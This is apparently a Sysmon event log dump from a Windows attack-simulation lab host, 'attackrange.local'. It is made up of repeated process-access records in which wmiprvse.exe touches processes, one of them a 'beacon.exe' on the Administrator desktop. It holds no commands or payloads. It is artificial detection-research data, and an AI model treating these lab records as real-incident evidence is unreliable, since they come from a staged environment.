Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240440Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240439Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240438Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240437Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C76689D9DB0944F6C2508D9EE7FE155,SHA256=EA3C211B99A8951B67F7BF264B447AA5F5EC88662DBDFF715D40D0AD68F3BC37,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240436Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240435Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.435{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240434Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240433Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240432Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240431Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240430Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002240429Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:03.420{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728\PSHost.132591776432796469.12728.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002240428Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240427Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240426Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240425Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240424Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240423Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240422Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.420{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\S